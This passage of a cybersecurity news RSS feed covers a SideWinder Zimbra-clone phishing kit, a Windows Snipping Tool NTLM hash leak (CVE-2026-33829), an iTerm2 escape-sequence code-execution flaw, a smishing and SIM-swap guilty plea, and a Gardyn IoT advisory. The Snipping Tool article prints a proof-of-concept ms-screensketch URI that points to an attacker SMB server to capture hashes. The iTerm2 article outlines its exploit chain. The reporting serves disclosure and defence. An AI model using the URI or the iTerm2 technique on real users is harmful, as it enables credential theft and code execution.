href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<p>The credential harvester injects two script behaviors into the page. First, it forces an error message to stay visible that reads &#8220;Your session has expired. Please login again to continue,&#8221; which pushes the victim to log in again. </p>



<p>Second, after the victim submits their credentials, the server re-renders the login page with their username already filled in, making them believe the login attempt failed and prompting them to re-enter their password. </p>



<p>This double-submission tactic maximizes the number of credentials collected per victim. Each page load also generates a unique rotating CSRF token using express-session, confirming that the kit operates with full server-side session management.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/7411ff93-c546-427a-a993-dddee441be39/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.pdf?AWSAccessKeyId=ASIA2F3EMEYEWQOYUKKV&amp;Signature=LLG5pKCCleaPuM9hYYnCAgHJ4mk%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJIMEYCIQDFV4lOMxDyR7E4idEXLvC9UzuzPpMpeJCj31DFEPvtZgIhAIx0t2eU751goB91%2BACXK7OZc0lgYTorLrSjWflNjHXtKvMECDEQARoMNjk5NzUzMzA5NzA1Igz9cA3eNuivv8ssowgq0ATQHJ5UjxWEuhyBImGlryZsgA9ro1Aw30lVIiz%2F%2FLCDuEyGAgBu891zf9orCQf5glM%2B%2BY%2BehYQt3LlWmkrTvyNi0Q%2BJBhAweU7mAFL3NJJB%2BsXQk%2FZAhW8AaCzrILVB7pogjNNsG9heKVsnuET2vBFHJ%2BnGO6zicWSUla0z01P1z0oNwzGswgQVjHZiMNhkPJYPj%2FTAiT1rNqJ65m9%2BdZM59Dw%2B4rXoitufvfK79sziIxIwxXHJ6bOheCy7pm9kEjQnosL8qBOkDpiTt8m3ZJMRGjBthDPbD6UfMYYhh99xj9vwfI5KttnHuDBnkQp9B6JBO0PFwpcHnK8PlCHmsJ%2B%2BQadk0lL5wMKjv9vClsVsA4LK9I90hgJfwl8jBZjGSk5pyG2zInPmR%2BbJ8xd4QdlvP5eza8IxdICTnyMRhxCs55yZMzuADqiIpqjTBeXzJEPqr4Mshj9ewIPdqOO%2Bt5ZCzISJiKsPoqrrslx%2BG%2F%2Bzf8DC6YP3OBZtgLP2DzzwbDkHKXEnj71nApgdlPUbkGRbsLjIu7pw%2BHL3t9luoPkGrUSQH98Zlv9wUEwI9Gxn9si6p4zjiR3c0iQ3NdCumpdbTpYsFejpF8zXvZEyP9Z6no1vlJoEzm8PIII%2BoJBR2pgOgI1jdiYarLbMAIO%2Bqp3S3B2l8ecLUMeOQQg%2Fo8pwdgiid7xaOn0Z%2B9ype0Gt1HFPTUe4lB9Im%2BYfY33twXA0vyB1ob1mfcU1ewrMzzeffR4w%2BOEC%2FoWV1i9AQzPwT3OT3OlpBsIg5k18oTiyMkIQMMTPnM8GOpcBjKCkO4kWLUbmI8vV5SePwtMRjLzYTHcIi%2FMCj2qdTERT3LUd1bdmC%2FwZgY%2Fr6sz%2BBZqHtXittOrsJXDJfsCyp2KiYHtbh8reU8UIcJrH9jAnavvXwAX2Md98q7AoL1Xb0TXQKEICg7o2GCKrOXmhaaG%2FbQ6UpD%2BFpK%2BeTpxIiq4GoY82jOb5tAueshDVF0QWYvhOI8Zfkg%3D%3D&amp;Expires=1776757336" target="_blank" rel="noreferrer noopener"></a></p>



<p>Security teams and affected organizations should take several immediate steps. Bangladesh Navy should rotate all credentials for mail.navy.mil.bd users without delay, and BGD e-GOV CIRT should be notified at cert@cirt.gov.bd about the active credential harvesting operation. </p>



<p>Pakistan&#8217;s NTISB should also be alerted regarding the leaked diplomatic communications used as lures. The phishing Worker at twilight-violet-55a5.malik-jaani786.workers.dev should be reported to <a href="https://cybersecuritynews.com/cloudflare-zero-trust-tool/" id="4774" target="_blank" rel="noreferrer noopener">Cloudflare Trust</a> and Safety. </p>



<p>Organizations should block all subdomains under malik-jaani786.workers.dev and monitor URLScan for new Workers subdomains from the same account. </p>



<p><a href="https://cybersecuritynews.com/security-teams-shrink-as-automation-rises/" id="100650" target="_blank" rel="noreferrer noopener">Security teams</a> should also watch for new Cloudflare Workers accounts that use the same Express.js plus Zimbra clone pattern, as the threat actor has already rotated accounts once from girlfriendparty42.workers.dev to malik-jaani786.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> to Get More Instant Updates</strong>, <strong>Set CSN as a Preferred Source in <a href="https://www.google.com/preferences/source?q=cybersecuritynews.com" target="_blank" rel="noreferrer noopener nofollow">Google</a>.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/sidewinder-uses-fake-chrome-pdf-viewer-and-zimbra-clone/">SideWinder Uses Fake Chrome PDF Viewer and Zimbra Clone to Steal Government Webmail Credentials</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/SideWinder-Uses-Fake-Chrome-PDF-Viewer-and-Zimbra-Clone-to-Steal-Government-Webmail-Credentials.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">148015</post-id>	</item>
		<item>
		<title>PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability</title>
		<link>https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/</link>
		
		<dc:creator><![CDATA[Guru Baran]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 04:15:29 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147998</guid>

					<description><![CDATA[<p>A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft&#8217;s Snipping Tool that allows attackers to silently steal users&#8217; Net-NTLM credential hashes by luring them to a malicious webpage. Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/">PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft&#8217;s Snipping Tool that allows attackers to silently steal users&#8217; Net-NTLM credential hashes by luring them to a malicious webpage.</p>



<p>Tracked as CVE-2026-33829, the flaw resides in how <a href="https://cybersecuritynews.com/windows-snipping-tool-vulnerability/" target="_blank" rel="noreferrer noopener">Windows Snipping Tool handles deep link URI registrations</a> using the <code>ms-screensketch</code> protocol schema. Affected versions of the application register this deep link, which accepts a <code>filePath</code> parameter.</p>



<p>Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim&#8217;s Net-NTLM hash in the process.</p>



<p>The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public.</p>



<h2 class="wp-block-heading" id="how-the-attack-works"><strong>Windows Snipping Tool PoC</strong></h2>



<p>Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The <a href="https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829" target="_blank" rel="noreferrer noopener nofollow">PoC from Black Arrow Security demonstrates</a> the attack with a single browser-triggered URI:</p>



<pre class="wp-block-preformatted">text<code>ms-screensketch:edit?&amp;filePath=\\&lt;attacker-smb-server&gt;\file.png&amp;isTemporary=false&amp;saved=true&amp;source=Toast</code></pre>



<p>When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user&#8217;s Net-NTLM authentication response to the attacker&#8217;s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources.</p>



<figure class="wp-block-image size-large"><img decoding="async" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJzHfTiqMx3F63jt8ahcD8pQVPXP8C6RWMoIGGxJfaq8To2mdVx_n5-ZLjS0lghz1VmoYGXD_p2jxCBdTsTxM-DpjuYDxgUdR5OcmAAXj4_lzerB-weik_x60i1ITyL4g5LsjgC4zpWVD8BQxqWpX90FuUlJdUL2Z0YjyuAZNAYivjtMXpkagI5AemfoH_/s16000/Snipping%20PoC.webp" alt=""/></figure>



<p>What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to <a href="https://cybersecuritynews.com/cybercriminals-abuse-irs-and-tax-filing-lures/" target="_blank" rel="noreferrer noopener">social engineering campaigns</a>. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document.</p>



<p>An attacker could register a domain like <code>snip.example.com</code> and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes.</p>



<p>The victim sees nothing unusual; the Snipping Tool opens as expected while <a href="https://cybersecuritynews.com/hackers-exploit-ntlm-authentication-flaws-to-target-windows-systems/" target="_blank" rel="noreferrer noopener">NTLM authentication</a> occurs transparently in the background.</p>



<p>This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common.</p>



<h2 class="wp-block-heading" id="patch-availability-and-timeline"><strong>Patch Availability and Timeline</strong></h2>



<p>Microsoft addressed the vulnerability in its <a href="https://cybersecuritynews.com/microsoft-patch-tuesday-april-2026/" target="_blank" rel="noreferrer noopener">April 14, 2026, Patch Tuesday security update</a>. The disclosure timeline is as follows:</p>



<ul class="wp-block-list">
<li>March 23, 2026 — Vulnerability reported to Microsoft.</li>



<li>April 14, 2026 — Microsoft releases a security patch.</li>



<li>April 14, 2026 — Coordinated public advisory and PoC release.</li>
</ul>



<p>Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update.</p>



<p>Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/">PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/Windows-Snipping-Tool-PoC.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147998</post-id>	</item>
		<item>
		<title>iTerm2 Flaw Abuses SSH Integration Escape Sequences to Turn Text Into Code Execution</title>
		<link>https://cybersecuritynews.com/iterm2-flaw-abuses-ssh-integration/</link>
		
		<dc:creator><![CDATA[Abinaya]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 03:23:22 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Vulnerability News]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147925</guid>

					<description><![CDATA[<p>Cybersecurity researchers, working in partnership with OpenAI, have uncovered a fascinating and severe vulnerability in iTerm2, a widely used macOS terminal emulator. According to Califio, the flaw abuses the application&#8217;s SSH integration feature, allowing attackers to turn seemingly harmless text output into local remote code execution (RCE). Simply viewing a maliciously crafted text file can [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/iterm2-flaw-abuses-ssh-integration/">iTerm2 Flaw Abuses SSH Integration Escape Sequences to Turn Text Into Code Execution</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers, working in partnership with OpenAI, have uncovered a fascinating and severe vulnerability in iTerm2, a widely used macOS terminal emulator.</p>



<p>According to Califio, the flaw abuses the application&#8217;s SSH integration feature, allowing attackers to turn seemingly <a href="https://cybersecuritynews.com/flowise-vulnerability/" target="_blank" rel="noreferrer noopener">harmless text output into local remote code execution (RCE).</a></p>



<p>Simply viewing a maliciously crafted text file can trigger the exploit. To grasp how this exploit works, it helps to understand iTerm2&#8217;s SSH integration.</p>



<p>Rather than unthinkingly typing commands into a remote shell, iTerm2 deploys a tiny helper script, the &#8220;conductor,&#8221; to the remote machine.</p>



<p>This script communicates with iTerm2 to coordinate tasks like discovering the login shell, changing directories, and uploading files. Crucially, this protocol does not use a separate network service.</p>



<p>The Califio research team explains that the conductor script operates inside the remote shell session, and all communication is carried over normal <a href="https://cybersecuritynews.com/invisiblejs-tool/" target="_blank" rel="noreferrer noopener">terminal input/output (I/O) via the pseudoterminal (PTY)</a>.</p>



<p>The vulnerability stems from a fundamental trust failure. iTerm2 accepts the <a href="https://cybersecuritynews.com/rdp-vs-ssh/" target="_blank" rel="noreferrer noopener">SSH conductor protocol from any terminal output</a>, even if it does not originate from a verified, trusted conductor session.</p>



<p>This means that untrusted terminal output can effectively impersonate the remote conductor by using specific terminal escape sequences:</p>



<ul class="wp-block-list">
<li><strong>DCS 2000p</strong> is used to forge a hook into the SSH conductor.<br></li>



<li><strong>OSC 135</strong> is used to send fake replies and messages back to iTerm2.</li>
</ul>



<p>If an attacker hides these sequences in a text file, server response, or <a href="https://cybersecuritynews.com/how-threat-actors-establish-persistence-on-linux-systems/" target="_blank" rel="noreferrer noopener">Message of the Day (MOTD)</a>, rendering that text triggers the flaw.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<div class="youtube-embed" data-video_id="J-CyOJcKXwg"><iframe title="Even cat readme.txt is not safe" width="696" height="392" src="https://www.youtube.com/embed/J-CyOJcKXwg?feature=oembed&#038;enablejsapi=1" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
</div></figure>



<p>For example, simply running<code>&nbsp;cat readme.txt</code>&nbsp;on a compromised file will print the forged sequences to the screen, tricking iTerm2 into believing it has initiated a legitimate SSH integration exchange.</p>



<h2 class="wp-block-heading" id="h-pty-confusion-and-exploitation"><strong>PTY Confusion and Exploitation</strong></h2>



<p>Califio highlights that iTerm2 accepts the fake conductor hook; it automatically begins its standard workflow, sending requests to verify shell environments and Python versions.</p>



<p>Because the <a href="https://cybersecuritynews.com/synology-ssl-vpn-client-vulnerabilities/" target="_blank" rel="noreferrer noopener">malicious text file acts as a fake transcript,</a> it feeds iTerm2 precise replies that push the terminal emulator down its fallback execution path.</p>



<p>Believing it’s communicating with a remote server, iTerm2 constructs a command execution request using attacker-controlled <code>sshargs</code>, <a href="https://cybersecuritynews.com/hackers-weaponize-obsidian-shell-commands-plugin/" target="_blank" rel="noreferrer noopener">writing the commands to the PTY as base64-encoded strings</a>.</p>



<p>However, because there is no actual SSH connection routing the data to a remote machine, the local shell receives these base64 commands as plain local input.</p>



<p>The exploit relies on carefully formatting the&nbsp;sshargs&nbsp;payload so that the final base64-encoded chunk translates into a valid local file path, such as&nbsp;<code>ace/c+aliFIo</code>.</p>



<p>If the attacker places an executable payload at that specific relative path, the terminal interprets the base64 string as a local command and unknowingly executes the malware.</p>



<p><a href="https://blog.calif.io/p/mad-bugs-even-cat-readmetxt-is-not" target="_blank" rel="noreferrer noopener nofollow">The Califio reported the flaw to iTerm2 on March 30</a>, with a fix committed the next day, though it hasn’t yet reached stable releases.</p>



<p>Until the patched version is distributed to the public, users should exercise extreme caution when reading untrusted text files or connecting to unfamiliar SSH servers, as these may serve malicious terminal output.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/iterm2-flaw-abuses-ssh-integration/">iTerm2 Flaw Abuses SSH Integration Escape Sequences to Turn Text Into Code Execution</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/iTerm2-Flaw-Abuses-SSH-Integration-Escape-Sequences-to-Turn-Text-Into-Code-Execution.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147925</post-id>	</item>
		<item>
		<title>British National Admits Hacking Companies and Stealing Millions in Virtual Currency</title>
		<link>https://cybersecuritynews.com/british-national-stealing-millions-in-virtual-currency/</link>
		
		<dc:creator><![CDATA[Abinaya]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 03:19:57 +0000</pubDate>
				<category><![CDATA[cryptocurrency]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147907</guid>

					<description><![CDATA[<p>A British man has pleaded guilty in the United States to his role in a large cybercrime scheme that used SMS phishing, company network intrusions, and SIM swapping to steal at least $1 million in virtual currency from victims across the country. Tyler Robert Buchanan,&#160;of Dundee, Scotland, was admitted to conspiracy to commit wire fraud [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/british-national-stealing-millions-in-virtual-currency/">British National Admits Hacking Companies and Stealing Millions in Virtual Currency</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A British man has pleaded guilty in the United States to his role in a large cybercrime scheme that used SMS phishing, company network intrusions, and SIM swapping to steal at least $1 million in virtual currency from victims across the country.</p>



<p>Tyler Robert Buchanan,&nbsp;of Dundee, Scotland, was admitted to conspiracy to <a href="https://cybersecuritynews.com/hacker-charged/" target="_blank" rel="noreferrer noopener">commit wire fraud and aggravated identity theft</a>.</p>



<p>U.S. prosecutors said Buchanan worked with others between September and April to target at least a dozen companies and many individual victims. He has been in federal custody since April.</p>



<h2 class="wp-block-heading" id="h-stole-millions-in-virtual-currency"><strong>Stole Millions in Virtual Currency</strong></h2>



<p>According to court records, the group launched large-scale <a href="https://cybersecuritynews.com/imessage-smishing-attack/" target="_blank" rel="noreferrer noopener">SMS phishing campaigns, also known as smishing attacks</a>.</p>



<p>They sent hundreds of text messages to employees at targeted companies. These messages appeared to come from the victim company or from trusted third-party IT and business process outsourcing providers.</p>



<p>The texts contained links to fake login pages that appeared to be real corporate websites. When employees entered their usernames, passwords, and other personal information, the data was captured by a phishing kit controlled by the attackers.</p>



<p>Prosecutors said the <a href="https://cybersecuritynews.com/new-torg-grabber-stealer-moves-from-telegram/" target="_blank" rel="noreferrer noopener">stolen credentials were then sent to a Telegram channel</a> administered by Buchanan and another co-conspirator. Using these credentials, the attackers accessed employee accounts and company systems.</p>



<p>They stole sensitive information, including confidential business files, intellectual property, names, email addresses, telephone numbers, and account access data.</p>



<p>Buchanan later admitted that investigators found files linked to many victim companies at his residence in Scotland.</p>



<p>Authorities said the stolen company data helped the group identify individuals with valuable holdings of virtual currency. Buchanan and his co-conspirators then moved to compromise those personal accounts and digital wallets.</p>



<p>To bypass security controls, the group used <a href="https://cybersecuritynews.com/sim-swapping-protection-esim/" target="_blank" rel="noreferrer noopener">SIM swapping</a>. In these attacks, a criminal convinces or tricks a mobile carrier into porting a victim’s phone number to a SIM card under the attacker&#8217;s control.</p>



<p>Once the number is transferred, the attacker can intercept one-time passcodes and <a href="https://cybersecuritynews.com/new-telegram-phishing-attack-abuses-authentication-workflows/" target="_blank" rel="noreferrer noopener">SMS-based two-factor authentication messages, allowing access to protected accounts.</a></p>



<p>Investigators found additional evidence on a device at Buchanan’s home, including names and addresses of victims, cryptocurrency seed phrases, and login details for at least one victim’s account.</p>



<p>Buchanan admitted the conspiracy stole at least a million in virtual assets from victims in the United States.</p>



<p><a href="https://www.justice.gov/usao-cdca/pr/british-national-pleads-guilty-hacking-companies-and-stealing-least-8-million-virtual" target="_blank" rel="noreferrer noopener nofollow">U.S. District Judge John W. Holcomb has scheduled sentencing</a> for August. Buchanan faces a maximum sentence of years in federal prison.</p>



<p>One co-conspirator, Noah Michael Urban of Florida, previously received a&nbsp;one-year federal prison sentence and was ordered to pay million in restitution.</p>



<p>Three other defendants still face charges. The FBI investigated the case with help from international and domestic law enforcement partners, including Police Scotland and authorities in Spain.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 94%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> for daily cybersecurity updates. <a href="https://cybersecuritynews.com/contact-us/" target="_blank" rel="noreferrer noopener nofollow">Contact us</a> to feature your stories.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/british-national-stealing-millions-in-virtual-currency/">British National Admits Hacking Companies and Stealing Millions in Virtual Currency</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/British-National-Admits-Hacking-Companies-and-Stealing-Millions-in-Virtual-Currency.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147907</post-id>	</item>
		<item>
		<title>Critical Gardyn Smart Gardens Vulnerabilities Let Attackers Control Devices Remotely</title>
		<link>https://cybersecuritynews.com/gardyn-smart-gardens-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Abinaya]]></dc:creator>
		<pubDate>Tue, 21 Apr 2026 03:14:27 +0000</pubDate>
				<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[Vulnerability News]]></category>
		<category><![CDATA[cyber security]]></category>
		<category><![CDATA[cyber security news]]></category>
		<guid isPermaLink="false">https://cybersecuritynews.com/?p=147871</guid>

					<description><![CDATA[<p>The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical warning about severe vulnerabilities in Gardyn Home Kit smart garden systems. Carrying a maximum severity score of 9.3 out of 10, these flaws could allow unauthenticated attackers to hijack smart agricultural devices from remote locations completely. First detailed in February 2026 and recently updated [&#8230;]</p>
<p>The post <a href="https://cybersecuritynews.com/gardyn-smart-gardens-vulnerabilities/">Critical Gardyn Smart Gardens Vulnerabilities Let Attackers Control Devices Remotely</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical warning about severe vulnerabilities in Gardyn Home Kit smart garden systems.</p>



<p>Carrying a maximum severity score of 9.3 out of 10, these flaws could allow unauthenticated attackers to <a href="https://cybersecuritynews.com/hackers-hijack-ai-agents/" target="_blank" rel="noreferrer noopener">hijack smart agricultural devices</a> from remote locations completely.</p>



<p>First detailed in February 2026 and recently updated on April 2, 2026, the CISA advisory (ICSA-26-055-03) outlines a dangerous chain of security gaps.</p>



<p>Security researcher Michael Groberman initially discovered and reported the vulnerabilities to CISA.</p>



<p>If exploited, attackers could access edge devices, <a href="https://cybersecuritynews.com/etcd-auth-bypass-vulnerability/" target="_blank" rel="noreferrer noopener">view sensitive cloud data without authentication,</a> and move laterally to other devices within the same Gardyn cloud environment.</p>



<h2 class="wp-block-heading" id="h-gardyn-smart-gardens-vulnerabilities"><strong>Gardyn Smart Gardens Vulnerabilities</strong></h2>



<p>The affected Gardyn systems suffer from a wide range of basic but critical security failures. The primary issues include the use of hard-coded and default credentials, which make it incredibly easy for threat actors to guess or extract administrative login details.</p>



<p>Furthermore, the system transmits sensitive information in clear text, meaning anyone intercepting network traffic can read it.</p>



<p>More complex flaws involve <a href="https://cybersecuritynews.com/tp-link-os-command-injection-vulnerability/" target="_blank" rel="noreferrer noopener">OS command injection </a>and the lack of authentication protocols for critical functions.</p>



<p>This allows malicious actors to bypass standard authorization checks, manipulate user-controlled keys, and exploit active debug codes left behind in the software.</p>



<p>Together, these vulnerabilities spanning multiple CVEs, <a href="https://cybersecuritynews.com/bodysnatcher-vulnerability-impersonate-servicenow-user/" target="_blank" rel="noreferrer noopener">including CVE-2025-1242</a>, CVE-2025-10681, and several newly added 2026 CVEs, create a direct pathway for attackers to compromise both the physical smart planters and the broader cloud infrastructure.</p>



<p>These vulnerabilities heavily impact devices deployed within the United States food and agriculture sectors.</p>



<p>The specific components and versions affected include:</p>



<ul class="wp-block-list">
<li>Gardyn Home Firmware and Gardyn Studio Firmware.</li>



<li>Gardyn Mobile Application versions before 2.11.0.</li>



